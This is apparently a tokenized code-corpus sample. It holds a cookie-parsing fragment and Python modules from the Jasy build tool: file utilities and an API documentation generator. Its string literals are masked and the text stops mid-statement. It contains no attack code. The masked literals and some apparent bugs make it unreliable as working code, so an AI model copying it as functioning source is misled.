                for (key, val) in [(ckey[<NUM_LIT:0>].strip(), ckey[-<NUM_LIT:1>].strip()) for ckey in [keyval.split('<STR_LIT:=>') for keyval in res.group('<STR_LIT>').split('<STR_LIT:;>')]]:
                    if (key not in self.cookiejar[message['<STR_LIT>']]):
                        self.cookiejar[message['<STR_LIT>']][key] = set()
                    # Valueless flags (key == val) are recorded as a key
                    # with an empty value set.
                    if (val != key):
                        self.cookiejar[message['<STR_LIT>']][key].add(val)
<s> """<STR_LIT>""" <EOL> import shutil , os , hashlib <EOL> from jasy import UserError <EOL> def cp ( src , dst ) : <EOL> """<STR_LIT>""" <EOL> mkdir ( os . path . dirname ( dst ) ) <EOL> return shutil . copy2 ( src , dst ) <EOL> def cpdir ( src , dst ) : <EOL> """<STR_LIT>""" <EOL> return shutil . copytree ( src , dst ) <EOL> def exists ( name ) : <EOL> """<STR_LIT>""" <EOL> return os . path . exists ( name ) <EOL> def mkdir ( name ) : <EOL> """<STR_LIT>""" <EOL> if os . path . isdir ( name ) : <EOL> return <EOL> elif os . path . exists ( name ) : <EOL> raise UserError ( "<STR_LIT>" % name ) <EOL> return os . makedirs ( name ) <EOL> def mv ( src , dst ) : <EOL> """<STR_LIT>""" <EOL> return shutil . move ( src , dst ) <EOL> def rm ( name ) : <EOL> """<STR_LIT>""" <EOL> return os . remove ( name ) <EOL> def rmdir ( name ) : <EOL> """<STR_LIT>""" <EOL> return shutil . rmtree ( name ) <EOL> def write ( dst , content ) : <EOL> """<STR_LIT>""" <EOL> mkdir ( os . path . dirname ( dst ) ) <EOL> handle = open ( dst , mode = "<STR_LIT:w>" , encoding = "<STR_LIT:utf-8>" ) <EOL> handle . write ( content ) <EOL> handle . close ( ) <EOL> def syncfile ( src , dst ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . isfile ( src ) : <EOL> raise Exception ( "<STR_LIT>" % src ) <EOL> try : <EOL> dst_mtime = os . path . getmtime ( dst ) <EOL> src_mtime = os . path . getmtime ( src ) <EOL> if src_mtime == dst_mtime : <EOL> return False <EOL> except OSError : <EOL> pass <EOL> return cp ( src , dst ) <EOL> def sha1 ( fileOrPath , block_size = <NUM_LIT:2> ** <NUM_LIT:20> ) : <EOL> """<STR_LIT>""" <EOL> if type ( fileOrPath ) is str : <EOL> fileOrPath = open ( fileOrPath , "<STR_LIT:rb>" ) <EOL> sha1res = hashlib . sha1 ( ) <EOL> while True : <EOL> data = fileOrPath . read ( block_size ) <EOL> if not data : <EOL> break <EOL> sha1res . update ( data ) <EOL> return sha1res . hexdigest ( ) </s>
<s> import copy , re , os , json <EOL> import jasy . js . api . Data as Data <EOL> import jasy . js . api . Text as Text <EOL> import jasy . core . File as File <EOL> from jasy . js . util import * <EOL> import jasy . core . Console as Console <EOL> from jasy import UserError <EOL> __all__ = [ "<STR_LIT>" ] <EOL> itemMap = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> linkMap = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> linkExtract = re . compile ( r"<STR_LIT>" , re . M ) <EOL> internalLinkParse = re . compile ( r"<STR_LIT>" ) <EOL> def convertFunction ( item ) : <EOL> item [ "<STR_LIT>" ] = True <EOL> if "<STR_LIT>" in item : <EOL> params = item [ "<STR_LIT>" ] <EOL> paramsNew = [ ] <EOL> sortedParams = list ( sorted ( params , key = lambda paramName : params [ paramName ] [ "<STR_LIT>" ] ) ) <EOL> for paramName in sortedParams : <EOL> param = params [ paramName ] <EOL> param [ "<STR_LIT:name>" ] = paramName <EOL> paramsNew . append ( param ) <EOL> item [ "<STR_LIT>" ] = paramsNew <EOL> def convertTags ( item ) : <EOL> if "<STR_LIT>" in item : <EOL> tags = item [ "<STR_LIT>" ] <EOL> tagsNew = [ ] <EOL> if tags : <EOL> for tagName in sorted ( tags ) : <EOL> tag = { "<STR_LIT:name>" : tagName } <EOL> if tags [ tagName ] is not True : <EOL> tag [ "<STR_LIT:value>" ] = "<STR_LIT:+>" . join ( tags [ tagName ] ) <EOL> tagsNew . 
append ( tag ) <EOL> item [ "<STR_LIT>" ] = tagsNew <EOL> def safeUpdate ( dest , origin ) : <EOL> """<STR_LIT>""" <EOL> for key in origin : <EOL> if not key in dest : <EOL> dest [ key ] = origin [ dest ] <EOL> def isErrornous ( data ) : <EOL> if "<STR_LIT>" in data : <EOL> return True <EOL> if "<STR_LIT>" in data : <EOL> for paramName in data [ "<STR_LIT>" ] : <EOL> param = data [ "<STR_LIT>" ] [ paramName ] <EOL> if "<STR_LIT>" in param : <EOL> return True <EOL> return False <EOL> def mergeMixin ( className , mixinName , classApi , mixinApi ) : <EOL> Console . info ( "<STR_LIT>" , mixinName , className ) <EOL> sectionLink = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> for pos , section in enumerate ( ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) : <EOL> mixinItems = getattr ( mixinApi , section , None ) <EOL> if mixinItems : <EOL> classItems = getattr ( classApi , section , None ) <EOL> if not classItems : <EOL> classItems = { } <EOL> setattr ( classApi , section , classItems ) <EOL> for name in mixinItems : <EOL> if name in classItems : <EOL> if "<STR_LIT>" in classItems [ name ] : <EOL> classItems [ name ] [ "<STR_LIT>" ] . append ( { <EOL> "<STR_LIT:name>" : mixinName , <EOL> "<STR_LIT>" : "<STR_LIT>" % ( sectionLink [ pos ] , mixinName , name ) <EOL> } ) <EOL> else : <EOL> if not "<STR_LIT>" in classItems [ name ] : <EOL> classItems [ name ] [ "<STR_LIT>" ] = [ ] <EOL> classItems [ name ] [ "<STR_LIT>" ] . append ( { <EOL> "<STR_LIT:name>" : mixinName , <EOL> "<STR_LIT>" : "<STR_LIT>" % ( sectionLink [ pos ] , mixinName , name ) <EOL> } ) <EOL> else : <EOL> classItems [ name ] = { } <EOL> classItems [ name ] . update ( mixinItems [ name ] ) <EOL> if not "<STR_LIT>" in classItems [ name ] : <EOL> classItems [ name ] [ "<STR_LIT>" ] = [ ] <EOL> classItems [ name ] [ "<STR_LIT>" ] . 
append ( { <EOL> "<STR_LIT:name>" : mixinName , <EOL> "<STR_LIT>" : "<STR_LIT>" % ( sectionLink [ pos ] , mixinName , name ) <EOL> } ) <EOL> def connectInterface ( className , interfaceName , classApi , interfaceApi ) : <EOL> Console . debug ( "<STR_LIT>" , className , interfaceName ) <EOL> interfaceProperties = getattr ( interfaceApi , "<STR_LIT>" , None ) <EOL> if interfaceProperties : <EOL> classProperties = getattr ( classApi , "<STR_LIT>" , { } ) <EOL> for name in interfaceProperties : <EOL> if not name in classProperties : <EOL> Console . warn ( "<STR_LIT>" , className , name , interfaceName ) <EOL> else : <EOL> if not "<STR_LIT>" in classProperties [ name ] : <EOL> classProperties [ name ] [ "<STR_LIT>" ] = [ ] <EOL> classProperties [ name ] [ "<STR_LIT>" ] . append ( { <EOL> "<STR_LIT:name>" : interfaceName , <EOL> "<STR_LIT>" : "<STR_LIT>" % ( interfaceName , name ) <EOL> } ) <EOL> if not "<STR_LIT>" in classProperties [ name ] and "<STR_LIT>" in interfaceProperties [ name ] : <EOL> classProperties [ name ] [ "<STR_LIT>" ] = interfaceProperties [ name ] [ "<STR_LIT>" ] <EOL> if not "<STR_LIT>" in classProperties [ name ] and "<STR_LIT>" in interfaceProperties [ name ] : <EOL> classProperties [ name ] [ "<STR_LIT>" ] = interfaceProperties [ name ] [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in classProperties [ name ] and not "<STR_LIT>" in interfaceProperties [ name ] : <EOL> del classProperties [ name ] [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in interfaceProperties [ name ] : <EOL> if not "<STR_LIT>" in classProperties [ name ] : <EOL> classProperties [ name ] [ "<STR_LIT>" ] = { } <EOL> safeUpdate ( classProperties [ name ] [ "<STR_LIT>" ] , interfaceProperties [ name ] [ "<STR_LIT>" ] ) <EOL> interfaceEvents = getattr ( interfaceApi , "<STR_LIT>" , None ) <EOL> if interfaceEvents : <EOL> classEvents = getattr ( classApi , "<STR_LIT>" , { } ) <EOL> for name in interfaceEvents : <EOL> if not name in classEvents : <EOL> Console . 
warn ( "<STR_LIT>" , className , name , interfaceName ) <EOL> else : <EOL> if not "<STR_LIT>" in classEvents [ name ] : <EOL> classEvents [ name ] [ "<STR_LIT>" ] = [ ] <EOL> classEvents [ name ] [ "<STR_LIT>" ] . append ( { <EOL> "<STR_LIT:name>" : interfaceName , <EOL> "<STR_LIT>" : "<STR_LIT>" % ( interfaceName , name ) <EOL> } ) <EOL> if not "<STR_LIT>" in classEvents [ name ] and "<STR_LIT>" in interfaceEvents [ name ] : <EOL> classEvents [ name ] [ "<STR_LIT>" ] = interfaceEvents [ name ] [ "<STR_LIT>" ] <EOL> if not "<STR_LIT>" in classEvents [ name ] and "<STR_LIT>" in interfaceEvents [ name ] : <EOL> classEvents [ name ] [ "<STR_LIT>" ] = interfaceEvents [ name ] [ "<STR_LIT>" ] <EOL> if not "<STR_LIT:type>" in classEvents [ name ] and "<STR_LIT:type>" in interfaceEvents [ name ] : <EOL> classEvents [ name ] [ "<STR_LIT:type>" ] = interfaceEvents [ name ] [ "<STR_LIT:type>" ] <EOL> if "<STR_LIT>" in classEvents [ name ] and not "<STR_LIT>" in interfaceEvents [ name ] : <EOL> del classEvents [ name ] [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in interfaceEvents [ name ] : <EOL> if not "<STR_LIT>" in classEntry : <EOL> classEvents [ name ] [ "<STR_LIT>" ] = { } <EOL> safeUpdate ( classEvents [ name ] [ "<STR_LIT>" ] , interfaceEvents [ name ] [ "<STR_LIT>" ] ) <EOL> interfaceMembers = getattr ( interfaceApi , "<STR_LIT>" , None ) <EOL> if interfaceMembers : <EOL> classMembers = getattr ( classApi , "<STR_LIT>" , { } ) <EOL> for name in interfaceMembers : <EOL> if not name in classMembers : <EOL> Console . warn ( "<STR_LIT>" , className , name , interfaceName ) <EOL> else : <EOL> interfaceEntry = interfaceMembers [ name ] <EOL> classEntry = classMembers [ name ] <EOL> if not "<STR_LIT>" in classEntry : <EOL> classEntry [ "<STR_LIT>" ] = [ ] <EOL> classEntry [ "<STR_LIT>" ] . 
append ( { <EOL> "<STR_LIT:name>" : interfaceName , <EOL> "<STR_LIT>" : "<STR_LIT>" % ( interfaceName , name ) <EOL> } ) <EOL> if not "<STR_LIT>" in classEntry and "<STR_LIT>" in interfaceEntry : <EOL> classEntry [ "<STR_LIT>" ] = interfaceEntry [ "<STR_LIT>" ] <EOL> if not "<STR_LIT>" in classEntry and "<STR_LIT>" in interfaceEntry : <EOL> classEntry [ "<STR_LIT>" ] = interfaceEntry [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in classEntry and not "<STR_LIT>" in interfaceEntry : <EOL> del classEntry [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in interfaceEntry : <EOL> classEntry [ "<STR_LIT>" ] = interfaceEntry [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in interfaceEntry : <EOL> if not "<STR_LIT>" in classEntry : <EOL> classEntry [ "<STR_LIT>" ] = { } <EOL> safeUpdate ( classEntry [ "<STR_LIT>" ] , interfaceEntry [ "<STR_LIT>" ] ) <EOL> if "<STR_LIT>" in interfaceEntry : <EOL> if not "<STR_LIT>" in classEntry : <EOL> classEntry [ "<STR_LIT>" ] = { } <EOL> for paramName in interfaceEntry [ "<STR_LIT>" ] : <EOL> if not paramName in classEntry [ "<STR_LIT>" ] : <EOL> classEntry [ "<STR_LIT>" ] [ paramName ] = { } <EOL> classEntry [ "<STR_LIT>" ] [ paramName ] . update ( interfaceEntry [ "<STR_LIT>" ] [ paramName ] ) <EOL> if "<STR_LIT>" in classEntry [ "<STR_LIT>" ] [ paramName ] and not "<STR_LIT>" in interfaceEntry [ "<STR_LIT>" ] [ paramName ] : <EOL> del classEntry [ "<STR_LIT>" ] [ paramName ] [ "<STR_LIT>" ] <EOL> class ApiWriter ( ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , session ) : <EOL> self . __session = session <EOL> def __isIncluded ( self , className , classFilter ) : <EOL> if not classFilter : <EOL> return True <EOL> if type ( classFilter ) is tuple : <EOL> if className . 
startswith ( classFilter ) : <EOL> return True <EOL> elif not classFilter ( className ) : <EOL> return True <EOL> return False <EOL> def write ( self , distFolder , classFilter = None , callback = "<STR_LIT>" , showInternals = False , showPrivates = False , printErrors = True , highlightCode = True ) : <EOL> """<STR_LIT>""" <EOL> Console . info ( "<STR_LIT>" ) <EOL> Console . indent ( ) <EOL> apiData = { } <EOL> highlightedCode = { } <EOL> for project in self . __session . getProjects ( ) : <EOL> classes = project . getClasses ( ) <EOL> Console . info ( "<STR_LIT>" , Console . colorize ( project . getName ( ) , "<STR_LIT>" ) , Console . colorize ( "<STR_LIT>" % len ( classes ) , "<STR_LIT>" ) ) <EOL> Console . indent ( ) <EOL> for className in classes : <EOL> if self . __isIncluded ( className , classFilter ) : <EOL> data = classes [ className ] . getApi ( highlightCode ) <EOL> if not data . isEmpty : <EOL> apiData [ className ] = data <EOL> highlightedCode [ className ] = classes [ className ] . getHighlightedCode ( ) <EOL> else : <EOL> Console . info ( "<STR_LIT>" % className ) <EOL> Console . outdent ( ) <EOL> Console . outdent ( ) <EOL> Console . info ( "<STR_LIT>" ) <EOL> Console . indent ( ) <EOL> data , index , search = self . __process ( apiData , classFilter = classFilter , internals = showInternals , privates = showPrivates , printErrors = printErrors , highlightCode = highlightCode ) <EOL> Console . outdent ( ) <EOL> Console . info ( "<STR_LIT>" ) <EOL> Console . indent ( ) <EOL> writeCounter = <NUM_LIT:0> <EOL> extension = "<STR_LIT>" if callback else "<STR_LIT>" <EOL> compress = True <EOL> class JsonEncoder ( json . JSONEncoder ) : <EOL> def default ( self , obj ) : <EOL> if isinstance ( obj , set ) : <EOL> return list ( obj ) <EOL> return json . JSONEncoder . default ( self , obj ) <EOL> def encode ( content , name ) : <EOL> if compress : <EOL> jsonContent = json . 
dumps ( content , sort_keys = True , cls = JsonEncoder , separators = ( '<STR_LIT:U+002C>' , '<STR_LIT::>' ) ) <EOL> else : <EOL> jsonContent = json . dumps ( content , sort_keys = True , cls = JsonEncoder , indent = <NUM_LIT:2> ) <EOL> if callback : <EOL> return "<STR_LIT>" % ( callback , jsonContent , name ) <EOL> else : <EOL> return jsonContent <EOL> Console . info ( "<STR_LIT>" , len ( data ) ) <EOL> Console . indent ( ) <EOL> for className in data : <EOL> try : <EOL> classData = data [ className ] <EOL> if type ( classData ) is dict : <EOL> classExport = classData <EOL> else : <EOL> classExport = classData . export ( ) <EOL> File . write ( self . __session . expandFileName ( os . path . join ( distFolder , "<STR_LIT>" % ( className , extension ) ) ) , encode ( classExport , className ) ) <EOL> except TypeError as writeError : <EOL> Console . error ( "<STR_LIT>" , className , writeError ) <EOL> continue <EOL> Console . outdent ( ) <EOL> if highlightCode : <EOL> Console . info ( "<STR_LIT>" , len ( highlightedCode ) ) <EOL> Console . indent ( ) <EOL> for className in highlightedCode : <EOL> try : <EOL> File . write ( self . __session . expandFileName ( os . path . join ( distFolder , "<STR_LIT>" % className ) ) , highlightedCode [ className ] ) <EOL> except TypeError as writeError : <EOL> Console . error ( "<STR_LIT>" , className , writeError ) <EOL> continue <EOL> Console . outdent ( ) <EOL> Console . info ( "<STR_LIT>" ) <EOL> Console . indent ( ) <EOL> File . write ( self . __session . expandFileName ( os . path . join ( distFolder , "<STR_LIT>" % extension ) ) , encode ( index , "<STR_LIT>" ) ) <EOL> File . write ( self . __session . expandFileName ( os . path . join ( distFolder , "<STR_LIT>" % extension ) ) , encode ( search , "<STR_LIT>" ) ) <EOL> Console . outdent ( ) <EOL> Console . 
outdent ( ) <EOL> def __process ( self , apiData , classFilter = None , internals = False , privates = False , printErrors = True , highlightCode = True ) : <EOL> knownClasses = set ( list ( apiData ) ) <EOL> Console . info ( "<STR_LIT>" ) <EOL> for className in apiData : <EOL> classApi = apiData [ className ] <EOL> constructData = getattr ( classApi , "<STR_LIT>" , None ) <EOL> if constructData is not None : <EOL> if "<STR_LIT>" in constructData : <EOL> constructData [ "<STR_LIT>" ] = "<STR_LIT>" % ( className , constructData [ "<STR_LIT>" ] ) <EOL> for section in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> sectionData = getattr ( classApi , section , None ) <EOL> if sectionData is not None : <EOL> for name in sectionData : <EOL> if "<STR_LIT>" in sectionData [ name ] : <EOL> sectionData [ name ] [ "<STR_LIT>" ] = "<STR_LIT>" % ( className , sectionData [ name ] [ "<STR_LIT>" ] ) <EOL> Console . info ( "<STR_LIT>" ) <EOL> Console . indent ( ) <EOL> mergedClasses = set ( ) <EOL> def getApi ( className ) : <EOL> classApi = apiData [ className ] <EOL> if className in mergedClasses : <EOL> return classApi <EOL> classIncludes = getattr ( classApi , "<STR_LIT>" , None ) <EOL> if classIncludes : <EOL> for mixinName in classIncludes : <EOL> if not mixinName in apiData : <EOL> Console . error ( "<STR_LIT>" , className , mixinName ) <EOL> continue <EOL> mixinApi = apiData [ mixinName ] <EOL> if not hasattr ( mixinApi , "<STR_LIT>" ) : <EOL> mixinApi . includedBy = set ( ) <EOL> mixinApi . includedBy . add ( className ) <EOL> mergeMixin ( className , mixinName , classApi , getApi ( mixinName ) ) <EOL> mergedClasses . add ( className ) <EOL> return classApi <EOL> for className in apiData : <EOL> apiData [ className ] = getApi ( className ) <EOL> Console . outdent ( ) <EOL> Console . 
info ( "<STR_LIT>" ) <EOL> additionalTypes = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> def checkInternalLink ( link , className ) : <EOL> match = internalLinkParse . match ( link ) <EOL> if not match : <EOL> return '<STR_LIT>' % link <EOL> if match . group ( <NUM_LIT:3> ) is not None : <EOL> className = match . group ( <NUM_LIT:3> ) <EOL> if not className in knownClasses and not className in apiData : <EOL> return '<STR_LIT>' % link <EOL> if not className in apiData : <EOL> return True <EOL> classApi = apiData [ className ] <EOL> sectionName = match . group ( <NUM_LIT:2> ) <EOL> itemName = match . group ( <NUM_LIT:5> ) <EOL> if itemName is None : <EOL> return True <EOL> if sectionName is not None : <EOL> if not sectionName in linkMap : <EOL> return '<STR_LIT>' % link <EOL> section = getattr ( classApi , linkMap [ sectionName ] , None ) <EOL> if section is None : <EOL> return '<STR_LIT>' % link <EOL> else : <EOL> if itemName in section : <EOL> return True <EOL> return '<STR_LIT>' % link <EOL> for sectionName in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> section = getattr ( classApi , sectionName , None ) <EOL> if section and itemName in section : <EOL> return True <EOL> return '<STR_LIT>' % link <EOL> def checkLinksInItem ( item ) : <EOL> if "<STR_LIT:type>" in item : <EOL> if item [ "<STR_LIT:type>" ] == "<STR_LIT>" : <EOL> if "<STR_LIT>" in item : <EOL> for paramName in item [ "<STR_LIT>" ] : <EOL> paramEntry = item [ "<STR_LIT>" ] [ paramName ] <EOL> if "<STR_LIT:type>" in paramEntry : <EOL> for paramTypeEntry in paramEntry [ "<STR_LIT:type>" ] : <EOL> if not paramTypeEntry [ "<STR_LIT:name>" ] in knownClasses and not paramTypeEntry [ "<STR_LIT:name>" ] in additionalTypes and not ( "<STR_LIT>" in paramTypeEntry or "<STR_LIT>" in paramTypeEntry ) : <EOL> item [ "<STR_LIT>" ] = True <EOL> Console . 
error ( '<STR_LIT>' % ( paramTypeEntry [ "<STR_LIT:name>" ] , className ) ) <EOL> if not "<STR_LIT>" in paramTypeEntry and paramTypeEntry [ "<STR_LIT:name>" ] in knownClasses : <EOL> paramTypeEntry [ "<STR_LIT>" ] = True <EOL> if "<STR_LIT>" in item : <EOL> for returnTypeEntry in item [ "<STR_LIT>" ] : <EOL> if not returnTypeEntry [ "<STR_LIT:name>" ] in knownClasses and not returnTypeEntry [ "<STR_LIT:name>" ] in additionalTypes and not ( "<STR_LIT>" in returnTypeEntry or "<STR_LIT>" in returnTypeEntry ) : <EOL> item [ "<STR_LIT>" ] = True <EOL> Console . error ( '<STR_LIT>' % ( returnTypeEntry [ "<STR_LIT:name>" ] , className ) ) <EOL> if not "<STR_LIT>" in returnTypeEntry and returnTypeEntry [ "<STR_LIT:name>" ] in knownClasses : <EOL> returnTypeEntry [ "<STR_LIT>" ] = True <EOL> elif not item [ "<STR_LIT:type>" ] in builtinTypes and not item [ "<STR_LIT:type>" ] in pseudoTypes and not item [ "<STR_LIT:type>" ] in additionalTypes : <EOL> item [ "<STR_LIT>" ] = True <EOL> Console . error ( '<STR_LIT>' % ( item [ "<STR_LIT:type>" ] , className ) ) <EOL> if "<STR_LIT>" in item : <EOL> def processInternalLink ( match ) : <EOL> linkUrl = match . group ( <NUM_LIT:2> ) <EOL> if linkUrl . startswith ( "<STR_LIT:#>" ) : <EOL> linkCheck = checkInternalLink ( linkUrl [ <NUM_LIT:1> : ] , className ) <EOL> if linkCheck is not True : <EOL> item [ "<STR_LIT>" ] = True <EOL> if sectionName : <EOL> Console . error ( "<STR_LIT>" % ( linkCheck , sectionName , className , name ) ) <EOL> else : <EOL> Console . error ( "<STR_LIT>" % ( linkCheck , className ) ) <EOL> linkExtract . sub ( processInternalLink , item [ "<STR_LIT>" ] ) <EOL> Console . 
indent ( ) <EOL> for className in apiData : <EOL> classApi = apiData [ className ] <EOL> sectionName = None <EOL> constructData = getattr ( classApi , "<STR_LIT>" , None ) <EOL> if constructData is not None : <EOL> checkLinksInItem ( constructData ) <EOL> for sectionName in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> section = getattr ( classApi , sectionName , None ) <EOL> if section is not None : <EOL> for name in section : <EOL> checkLinksInItem ( section [ name ] ) <EOL> Console . outdent ( ) <EOL> Console . info ( "<STR_LIT>" ) <EOL> def isVisible ( entry ) : <EOL> if "<STR_LIT>" in entry : <EOL> visibility = entry [ "<STR_LIT>" ] <EOL> if visibility == "<STR_LIT>" and not privates : <EOL> return False <EOL> if visibility == "<STR_LIT>" and not internals : <EOL> return False <EOL> return True <EOL> def filterInternalsPrivates ( classApi , field ) : <EOL> data = getattr ( classApi , field , None ) <EOL> if data : <EOL> for name in list ( data ) : <EOL> if not isVisible ( data [ name ] ) : <EOL> del data [ name ] <EOL> for className in apiData : <EOL> filterInternalsPrivates ( apiData [ className ] , "<STR_LIT>" ) <EOL> filterInternalsPrivates ( apiData [ className ] , "<STR_LIT>" ) <EOL> Console . info ( "<STR_LIT>" ) <EOL> Console . indent ( ) <EOL> for className in apiData : <EOL> classApi = getApi ( className ) <EOL> if not hasattr ( classApi , "<STR_LIT>" ) : <EOL> continue <EOL> classType = classApi . main [ "<STR_LIT:type>" ] <EOL> if classType == "<STR_LIT>" : <EOL> classImplements = getattr ( classApi , "<STR_LIT>" , None ) <EOL> if classImplements : <EOL> for interfaceName in classImplements : <EOL> interfaceApi = apiData [ interfaceName ] <EOL> implementedBy = getattr ( interfaceApi , "<STR_LIT>" , None ) <EOL> if not implementedBy : <EOL> implementedBy = interfaceApi . implementedBy = [ ] <EOL> implementedBy . append ( className ) <EOL> connectInterface ( className , interfaceName , classApi , interfaceApi ) <EOL> Console . 
outdent ( ) <EOL> Console . info ( "<STR_LIT>" ) <EOL> Console . indent ( ) <EOL> for className in list ( apiData ) : <EOL> classApi = apiData [ className ] <EOL> destName = classApi . main [ "<STR_LIT:name>" ] <EOL> if destName is not None and destName != className : <EOL> Console . debug ( "<STR_LIT>" , destName , className ) <EOL> if destName in apiData : <EOL> destApi = apiData [ destName ] <EOL> destApi . main [ "<STR_LIT>" ] . append ( className ) <EOL> else : <EOL> destApi = apiData [ destName ] = Data . ApiData ( destName , highlight = highlightCode ) <EOL> destApi . main = { <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT:name>" : destName , <EOL> "<STR_LIT>" : [ className ] <EOL> } <EOL> if "<STR_LIT>" in classApi . main and classApi . main [ "<STR_LIT>" ] is not None and "<STR_LIT>" in classApi . main [ "<STR_LIT>" ] : <EOL> if "<STR_LIT>" in classApi . main : <EOL> destApi . main [ "<STR_LIT>" ] = classApi . main [ "<STR_LIT>" ] <EOL> classApi . main [ "<STR_LIT>" ] = True <EOL> construct = getattr ( classApi , "<STR_LIT>" , None ) <EOL> statics = getattr ( classApi , "<STR_LIT>" , None ) <EOL> members = getattr ( classApi , "<STR_LIT>" , None ) <EOL> if construct is not None : <EOL> if hasattr ( destApi , "<STR_LIT>" ) : <EOL> Console . warn ( "<STR_LIT>" , destName , className ) <EOL> destApi . construct = copy . copy ( construct ) <EOL> if statics is not None : <EOL> if not hasattr ( destApi , "<STR_LIT>" ) : <EOL> destApi . statics = { } <EOL> for staticName in statics : <EOL> destApi . statics [ staticName ] = copy . copy ( statics [ staticName ] ) <EOL> destApi . statics [ staticName ] [ "<STR_LIT>" ] = className <EOL> destApi . statics [ staticName ] [ "<STR_LIT>" ] = "<STR_LIT>" % ( className , staticName ) <EOL> if members is not None : <EOL> if not hasattr ( destApi , "<STR_LIT>" ) : <EOL> destApi . members = { } <EOL> for memberName in members : <EOL> destApi . members [ memberName ] = copy . 
copy ( members [ memberName ] ) <EOL> destApi . members [ memberName ] [ "<STR_LIT>" ] = className <EOL> destApi . members [ memberName ] [ "<STR_LIT>" ] = "<STR_LIT>" % ( className , memberName ) <EOL> Console . outdent ( ) <EOL> Console . info ( "<STR_LIT>" ) <EOL> allClasses = set ( list ( apiData ) ) <EOL> for className in apiData : <EOL> uses = apiData [ className ] . uses <EOL> cleanUses = set ( ) <EOL> for use in uses : <EOL> if use != className and use in allClasses : <EOL> cleanUses . add ( use ) <EOL> useEntry = apiData [ use ] <EOL> if not hasattr ( useEntry , "<STR_LIT>" ) : <EOL> useEntry . usedBy = set ( ) <EOL> useEntry . usedBy . add ( className ) <EOL> apiData [ className ] . uses = cleanUses <EOL> Console . info ( "<STR_LIT>" ) <EOL> Console . indent ( ) <EOL> for className in sorted ( apiData ) : <EOL> classApi = apiData [ className ] <EOL> errors = [ ] <EOL> if isErrornous ( classApi . main ) : <EOL> errors . append ( { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:name>" : None , <EOL> "<STR_LIT>" : <NUM_LIT:1> <EOL> } ) <EOL> if hasattr ( classApi , "<STR_LIT>" ) : <EOL> if isErrornous ( classApi . construct ) : <EOL> errors . append ( { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:name>" : None , <EOL> "<STR_LIT>" : classApi . construct [ "<STR_LIT>" ] <EOL> } ) <EOL> for section in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> items = getattr ( classApi , section , { } ) <EOL> for itemName in items : <EOL> item = items [ itemName ] <EOL> if isErrornous ( item ) : <EOL> errors . append ( { <EOL> "<STR_LIT>" : itemMap [ section ] , <EOL> "<STR_LIT:name>" : itemName , <EOL> "<STR_LIT>" : item [ "<STR_LIT>" ] <EOL> } ) <EOL> if errors : <EOL> if printErrors : <EOL> Console . warn ( "<STR_LIT>" , className ) <EOL> errorsSorted = sorted ( errors , key = lambda entry : entry [ "<STR_LIT>" ] ) <EOL> if printErrors : <EOL> Console . 
indent ( ) <EOL> for entry in errorsSorted : <EOL> if entry [ "<STR_LIT:name>" ] : <EOL> Console . warn ( "<STR_LIT>" , entry [ "<STR_LIT>" ] , entry [ "<STR_LIT:name>" ] , entry [ "<STR_LIT>" ] ) <EOL> else : <EOL> Console . warn ( "<STR_LIT>" , entry [ "<STR_LIT>" ] , entry [ "<STR_LIT>" ] ) <EOL> Console . outdent ( ) <EOL> classApi . errors = errorsSorted <EOL> Console . outdent ( ) <EOL> Console . info ( "<STR_LIT>" ) <EOL> search = { } <EOL> def addSearch ( classApi , field ) : <EOL> data = getattr ( classApi , field , None ) <EOL> if data : <EOL> for name in data : <EOL> if not name in search : <EOL> search [ name ] = set ( ) <EOL> search [ name ] . add ( className ) <EOL> for className in apiData : <EOL> classApi = apiData [ className ] <EOL> addSearch ( classApi , "<STR_LIT>" ) <EOL> addSearch ( classApi , "<STR_LIT>" ) <EOL> addSearch ( classApi , "<STR_LIT>" ) <EOL> addSearch ( classApi , "<STR_LIT>" ) <EOL> Console . info ( "<STR_LIT>" ) <EOL> for className in sorted ( apiData ) : <EOL> classApi = apiData [ className ] <EOL> convertTags ( classApi . main ) <EOL> construct = getattr ( classApi , "<STR_LIT>" , None ) <EOL> if construct : <EOL> convertFunction ( construct ) <EOL> convertTags ( construct ) <EOL> for section in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> items = getattr ( classApi , section , None ) <EOL> if items : <EOL> sortedList = [ ] <EOL> for itemName in sorted ( items ) : <EOL> item = items [ itemName ] <EOL> item [ "<STR_LIT:name>" ] = itemName <EOL> if "<STR_LIT:type>" in item and item [ "<STR_LIT:type>" ] == "<STR_LIT>" : <EOL> convertFunction ( item ) <EOL> convertTags ( item ) <EOL> sortedList . append ( item ) <EOL> setattr ( classApi , section , sortedList ) <EOL> Console . info ( "<STR_LIT>" ) <EOL> Console . indent ( ) <EOL> for project in self . __session . getProjects ( ) : <EOL> docs = project . getDocs ( ) <EOL> for packageName in docs : <EOL> if self . 
